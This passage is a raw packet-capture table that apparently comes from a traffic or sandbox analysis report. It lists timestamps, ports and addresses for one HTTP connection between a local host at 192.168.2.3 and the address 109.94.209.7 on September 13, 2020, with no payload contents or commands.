Sep 13, 2020 20:54:42.080818892 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080830097 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080943108 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080955982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080982924 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081007004 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081018925 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081103086 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081177950 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.081346035 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081374884 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081393003 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081403971 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081417084 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081428051 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081497908 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081523895 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081533909 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081545115 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081552029 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.081556082 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081705093 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081718922 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081728935 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081741095 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081747055 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.081832886 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081852913 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081865072 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081877947 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.081934929 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.082017899 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082083941 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.082231045 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082251072 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082298040 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082314014 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082406044 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.082426071 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082442045 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.082588911 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.083095074 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.083762884 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.144453049 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144607067 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.144624949 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144633055 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144812107 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.144814014 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144824982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144844055 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144902945 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144916058 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144951105 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.144998074 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145011902 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145025969 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145039082 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145051956 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145065069 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145077944 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145091057 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145102978 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145128965 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.145175934 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.145250082 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145266056 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145277977 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145289898 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145386934 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.145447016 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.145921946 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145968914 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.145987034 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.146006107 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.146140099 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.146574020 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.146666050 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.147411108 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147492886 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.147536039 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147547960 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147558928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147567987 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147721052 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147733927 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147788048 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.147866011 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.147867918 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.147934914 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.148061991 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.208770990 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.208802938 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.208889008 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.209052086 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209065914 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209075928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209156990 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.209224939 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209260941 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209363937 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.209402084 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.209572077 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209585905 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209600925 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209613085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209625959 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209748983 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.209789991 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209813118 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209822893 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209831953 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209845066 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209856987 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209867954 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209882975 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209897995 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.209984064 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.210199118 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.210221052 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.210345984 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.210427999 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.210444927 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.210519075 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.211802959 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.211812019 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.211966991 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.211987972 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.211994886 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212001085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212011099 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.212100029 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.212176085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212197065 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212203979 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212210894 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212217093 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212301016 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.212348938 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.212461948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212481976 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.212572098 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.273216009 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273245096 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273257971 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273350954 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273385048 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273397923 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273410082 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273489952 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.273544073 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273570061 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273581982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273621082 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273632050 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.273693085 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.273818970 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.273875952 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273886919 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273895025 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273904085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273925066 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.273936033 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274048090 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274060965 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274070024 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.274080038 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274122000 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274204969 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.274250984 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274311066 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274349928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274367094 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274404049 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274416924 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.274432898 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274508953 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.274841070 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274904966 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274934053 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.274970055 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.275044918 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.275115013 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.275228024 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.275257111 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.275366068 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.276429892 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276451111 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276489019 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276506901 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276601076 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276619911 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276638985 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276657104 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276660919 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.276674986 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276758909 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.276796103 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276814938 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276842117 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276859999 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276878119 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.276928902 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.071746111 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.072000980 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.136466980 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.155416965 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.200133085 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.329013109 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.329233885 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.393408060 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407110929 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407260895 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407311916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407387018 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407387972 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.407414913 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407442093 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407499075 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407515049 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407526970 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407540083 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.407543898 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.407669067 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.471539021 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471719027 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471806049 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471834898 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.471848965 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471908092 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471929073 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471955061 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.471972942 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.471992016 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472006083 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472021103 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472057104 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472080946 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472107887 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472110033 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.472126007 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472141981 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472160101 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472176075 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472193003 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472208977 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472224951 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.472234964 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.472328901 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.536762953 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536801100 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536818981 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536855936 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536895990 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536932945 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536942005 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.536950111 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536973953 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.536998034 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537012100 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537028074 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537044048 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537110090 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537194967 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537234068 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537269115 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537273884 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537302017 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537318945 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537334919 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537353992 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537369013 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537389994 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537419081 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537436008 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537451982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537468910 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537473917 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537568092 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537729025 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537756920 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537784100 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537811041 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537811995 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.537837982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537856102 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.537925959 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.538003922 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538022041 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538039923 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538055897 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538124084 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.538172960 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538197994 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538214922 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538230896 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538248062 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538290024 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.538336039 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.538425922 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.601175070 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601221085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601289988 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601315975 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.601316929 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601331949 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601376057 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601393938 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601409912 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601444960 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.601522923 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.602118969 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602170944 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602199078 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602209091 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.602216005 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602343082 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.602494955 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602513075 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.602600098 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.603146076 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603218079 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.603354931 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603413105 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603430033 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603434086 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.603446007 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603461027 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603477955 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603494883 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603575945 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:45.603635073 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:45.603668928 CEST	49717	80	192.168.2.3	109.94.209.7
